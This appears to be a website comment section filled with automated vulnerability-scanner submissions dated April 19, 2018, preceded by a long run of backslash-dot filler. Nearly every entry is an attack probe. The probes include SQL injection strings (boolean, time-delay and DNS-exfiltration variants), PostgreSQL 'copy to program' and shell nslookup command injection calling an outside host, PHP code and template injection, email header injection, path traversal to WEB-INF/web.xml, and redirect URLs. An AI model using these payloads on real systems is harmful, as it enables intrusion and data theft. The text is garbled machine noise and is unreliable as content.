\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1 - April 19, 2018, 6:35 pm
WEB-INF/web.xml

1 - April 19, 2018, 6:36 pm
WEB-INF\web.xml

1 - April 19, 2018, 6:36 pm
$(nslookup dns.ce.\037203.21-11421.21.8f9f8.\1.bxss.me)

1 bcc:037203.21-11422.21.8f9f8.1@bxss.me - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
1||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11425.21.8f9f8.1.bxss'||'.me')

1 - April 19, 2018, 6:36 pm
&nslookup dns.ce.\037203.21-11428.21.8f9f8.\1.bxss.me&'\"`0&nslookup dns.ce.\037203.21-11428.21.8f9f8.\1.bxss.me&`'

12345'"\'\");|]*{ <>''💩 - April 19, 2018, 6:36 pm
1

Array - April 19, 2018, 6:36 pm
1

to@example.com> bcc:037203.21-11429.21.8f9f8.1@bxss.me - April 19, 2018, 6:36 pm
1

12345'"\'\");|]*{ <>''💩 - April 19, 2018, 6:36 pm
1

Array - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
12345'"\'\");|]*{ <>''💩

1 - April 19, 2018, 6:36 pm
Array

1 bcc:037203.21-11431.21.8f9f8.1@bxss.me - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
12345'"\'\");|]*{ <>''💩

1 - April 19, 2018, 6:36 pm
Array

${9999062+9999690} - April 19, 2018, 6:36 pm
1

${9999420+10000141} - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
${9999842+9999892}

1 - April 19, 2018, 6:36 pm
${9999868+10000185}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg - April 19, 2018, 6:36 pm
1

1some_inexistent_file_with_long_name.jpg - April 19, 2018, 6:36 pm
1

Http://testasp.vulnweb.com/t/fit.txt - April 19, 2018, 6:36 pm
1

http://testasp.vulnweb.com/t/fit.txt?.jpg - April 19, 2018, 6:36 pm
1

testasp.vulnweb.com - April 19, 2018, 6:36 pm
1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
'||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11433.21.8f9f8.1.bxss'||'.me')||'

1some_inexistent_file_with_long_name.jpg - April 19, 2018, 6:36 pm
1

Http://testasp.vulnweb.com/t/fit.txt - April 19, 2018, 6:36 pm
1

http://testasp.vulnweb.com/t/fit.txt?.jpg - April 19, 2018, 6:36 pm
1

testasp.vulnweb.com - April 19, 2018, 6:36 pm
1

1 - April 19, 2018, 6:36 pm
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1 - April 19, 2018, 6:36 pm
1some_inexistent_file_with_long_name.jpg

1 - April 19, 2018, 6:36 pm
Http://testasp.vulnweb.com/t/fit.txt

1 - April 19, 2018, 6:36 pm
http://testasp.vulnweb.com/t/fit.txt?.jpg

1 - April 19, 2018, 6:36 pm
testasp.vulnweb.com

1 - April 19, 2018, 6:36 pm
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1 - April 19, 2018, 6:36 pm
1some_inexistent_file_with_long_name.jpg

1 - April 19, 2018, 6:36 pm
Http://testasp.vulnweb.com/t/fit.txt

1 - April 19, 2018, 6:36 pm
http://testasp.vulnweb.com/t/fit.txt?.jpg

1 - April 19, 2018, 6:36 pm
testasp.vulnweb.com

to@example.com> bcc:037203.21-11437.21.8f9f8.1@bxss.me - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
1;copy (select '') to program 'nslookup dns.sqli.\037203.21-11439.21.8f9f8.\1.bxss.me'

1 - April 19, 2018, 6:37 pm
1 bcc:037203.21-11443.21.8f9f8.1@bxss.me

1 - April 19, 2018, 6:37 pm
to@example.com> bcc:037203.21-11445.21.8f9f8.1@bxss.me

1 - April 19, 2018, 6:37 pm
1 bcc:037203.21-11447.21.8f9f8.1@bxss.me

1 - April 19, 2018, 6:37 pm
1';copy (select '') to program 'nslookup dns.sqli.\037203.21-11448.21.8f9f8.\1.bxss.me

1 - April 19, 2018, 6:37 pm
576'

1 - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1 OR 2+298-298-1=0+0+0+1 --

1 - April 19, 2018, 6:37 pm
-1 OR 3+298-298-1=0+0+0+1 --

1 - April 19, 2018, 6:37 pm
-1 OR 3*2<(0+5+298-298) --

1 - April 19, 2018, 6:37 pm
-1 OR 3*2>(0+5+298-298) --

1 - April 19, 2018, 6:37 pm
-1 OR 2+530-530-1=0+0+0+1

1 - April 19, 2018, 6:37 pm
-1 OR 3+530-530-1=0+0+0+1

1 - April 19, 2018, 6:37 pm
-1 OR 3*2<(0+5+530-530)

1 - April 19, 2018, 6:37 pm
-1 OR 3*2>(0+5+530-530)

1 - April 19, 2018, 6:37 pm
-1' OR 2+301-301-1=0+0+0+1 --

1&n925255=v969202 - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
1&n932473=v983882

1 - April 19, 2018, 6:37 pm
-1' OR 3+301-301-1=0+0+0+1 --

1 - April 19, 2018, 6:37 pm
-1' OR 3*2<(0+5+301-301) --

) - April 19, 2018, 6:37 pm
1

!(()&&!|*|*| - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1' OR 3*2>(0+5+301-301) --

^(#$!@#$)(()))****** - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1' OR 2+662-662-1=0+0+0+1 or 'xcQeqgvC'='

) - April 19, 2018, 6:37 pm
1

!(()&&!|*|*| - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1' OR 3+662-662-1=0+0+0+1 or 'xcQeqgvC'='

1 - April 19, 2018, 6:37 pm
-1' OR 3*2<(0+5+662-662) or 'xcQeqgvC'='

^(#$!@#$)(()))****** - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1' OR 3*2>(0+5+662-662) or 'xcQeqgvC'='

1 - April 19, 2018, 6:37 pm
)

1 - April 19, 2018, 6:37 pm
!(()&&!|*|*|

1 - April 19, 2018, 6:37 pm
-1" OR 2+354-354-1=0+0+0+1 --

1 - April 19, 2018, 6:37 pm
^(#$!@#$)(()))******

1 - April 19, 2018, 6:37 pm
-1" OR 3+354-354-1=0+0+0+1 --

1 - April 19, 2018, 6:37 pm
to@example.com> bcc:037203.21-11453.21.8f9f8.1@bxss.me

1 - April 19, 2018, 6:37 pm
)

1 - April 19, 2018, 6:37 pm
-1" OR 3*2<(0+5+354-354) --

1 - April 19, 2018, 6:37 pm
!(()&&!|*|*|

1 - April 19, 2018, 6:37 pm
-1" OR 3*2>(0+5+354-354) --

1 - April 19, 2018, 6:37 pm
^(#$!@#$)(()))******

1 - April 19, 2018, 6:37 pm
if(now()=sysdate(),sleep(12),0)/*'XOR(if(now()=sysdate(),sleep(12),0))OR'"XOR(if(now()=sysdate(),sleep(12),0))OR"*/

Array - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/

'"() - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1; waitfor delay '0:0:12' --

Array - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1); waitfor delay '0:0:12' --

;print(md5(acunetix_wvs_security_test)); - April 19, 2018, 6:37 pm
1

'"() - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
1 waitfor delay '0:0:12' --

';print(md5(acunetix_wvs_security_test));$a=' - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
Array

1 - April 19, 2018, 6:37 pm
Z6jNjw26'; waitfor delay '0:0:4' --

";print(md5(acunetix_wvs_security_test));$a=" - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1;select pg_sleep(4); --

1 - April 19, 2018, 6:37 pm
'"()

${@print(md5(acunetix_wvs_security_test))} - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
Array

1 - April 19, 2018, 6:37 pm
-1);select pg_sleep(4); --

${@print(md5(acunetix_wvs_security_test))}\ - April 19, 2018, 6:37 pm
1

;print(md5(acunetix_wvs_security_test)); - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
-1));select pg_sleep(4); --

1 - April 19, 2018, 6:37 pm
'"()

1 - April 19, 2018, 6:37 pm
POivDCCW';select pg_sleep(4); --

';print(md5(acunetix_wvs_security_test));$a=' - April 19, 2018, 6:37 pm
1

";print(md5(acunetix_wvs_security_test));$a=" - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
PlAXIeMo');select pg_sleep(4); --

${@print(md5(acunetix_wvs_security_test))} - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
8GqnWlYU'));select pg_sleep(8); --

${@print(md5(acunetix_wvs_security_test))}\ - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
;print(md5(acunetix_wvs_security_test));

1 - April 19, 2018, 6:37 pm
';print(md5(acunetix_wvs_security_test));$a='

1 - April 19, 2018, 6:37 pm
";print(md5(acunetix_wvs_security_test));$a="

http://testasp.vulnweb.com/t/xss.html?%00.jpg - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
http://testasp.vulnweb.com/t/xss.html?%00.jpg

1 - April 19, 2018, 6:37 pm
${@print(md5(acunetix_wvs_security_test))}\

1 - April 19, 2018, 6:37 pm
;print(md5(acunetix_wvs_security_test));

1 - April 19, 2018, 6:37 pm
http://testasp.vulnweb.com/t/xss.html?%00.jpg

1 - April 19, 2018, 6:37 pm
';print(md5(acunetix_wvs_security_test));$a='

1 - April 19, 2018, 6:37 pm
";print(md5(acunetix_wvs_security_test));$a="

thoisu801.php - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
${@print(md5(acunetix_wvs_security_test))}

thoisu801.php - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
${@print(md5(acunetix_wvs_security_test))}\

thoisu801.php/. - April 19, 2018, 6:37 pm
1

thoisu801.php - April 19, 2018, 6:37 pm
1

thoisu801.php - April 19, 2018, 6:37 pm
1

thoisu801.php/. - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
1||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11458.21.8f9f8.1.bxss'||'.me')

1 - April 19, 2018, 6:37 pm
thoisu801.php

http://hitzUKMMoKwJG.bxss.me/ - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
thoisu801.php

1 - April 19, 2018, 6:37 pm
thoisu801.php/.

http://hit8oVfp9XRVt.bxss.me/ - April 19, 2018, 6:37 pm
1

1 - April 19, 2018, 6:37 pm
thoisu801.php

1 - April 19, 2018, 6:37 pm
http://hitl1RYTpvcNR.bxss.me/

1 - April 19, 2018, 6:37 pm
thoisu801.php

1 - April 19, 2018, 6:37 pm
http://hitHdMVTwx4ZM.bxss.me/

1 - April 19, 2018, 6:37 pm
thoisu801.php/.

1'" - April 19, 2018, 6:38 pm
1

\ - April 19, 2018, 6:38 pm
1

1%2527%2522 - April 19, 2018, 6:38 pm
1

@@mwnBk - April 19, 2018, 6:38 pm
1

JyI= - April 19, 2018, 6:38 pm
1

'" - April 19, 2018, 6:38 pm
1

''"" - April 19, 2018, 6:38 pm
1

1'" - April 19, 2018, 6:38 pm
1

\ - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
'||UTL_INADDR.get_host_address('dns.'||'sqli.037203.21-11463.21.8f9f8.1.bxss'||'.me')||'

1%2527%2522 - April 19, 2018, 6:38 pm
1

@@BKPxV - April 19, 2018, 6:38 pm
1

JyI= - April 19, 2018, 6:38 pm
1

'" - April 19, 2018, 6:38 pm
1

''"" - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
1'"

1 - April 19, 2018, 6:38 pm
\

1 - April 19, 2018, 6:38 pm
1%2527%2522

1 - April 19, 2018, 6:38 pm
@@52iEt

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
JyI=

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
'"

1 - April 19, 2018, 6:38 pm
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 - April 19, 2018, 6:38 pm
''""

1 - April 19, 2018, 6:38 pm
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1 - April 19, 2018, 6:38 pm
1'"

1 - April 19, 2018, 6:38 pm
\

/www.vulnweb.com - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
1%2527%2522

/www.vulnweb.com - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
@@A1ldP

936759 - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
JyI=

1 - April 19, 2018, 6:38 pm
1;copy (select '') to program 'nslookup dns.sqli.\037203.21-11469.21.8f9f8.\1.bxss.me'

http://www.vulnweb.com - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
'"

//www.vulnweb.com - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
''""

/\www.vulnweb.com - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
/www.vulnweb.com

1 - April 19, 2018, 6:38 pm
969132

1 - April 19, 2018, 6:38 pm
http://www.vulnweb.com

1 - April 19, 2018, 6:38 pm
//www.vulnweb.com

1 - April 19, 2018, 6:38 pm
/\www.vulnweb.com

1 - April 19, 2018, 6:38 pm
/www.vulnweb.com

1 - April 19, 2018, 6:38 pm
929686

1 - April 19, 2018, 6:38 pm
http://www.vulnweb.com

1 - April 19, 2018, 6:38 pm
//www.vulnweb.com

1 - April 19, 2018, 6:38 pm
/\www.vulnweb.com

1 - April 19, 2018, 6:38 pm
1';copy (select '') to program 'nslookup dns.sqli.\037203.21-11473.21.8f9f8.\1.bxss.me

'" - April 19, 2018, 6:38 pm
1

1 - April 19, 2018, 6:38 pm
52'

1'"()&% - April 19, 2018, 6:38 pm
1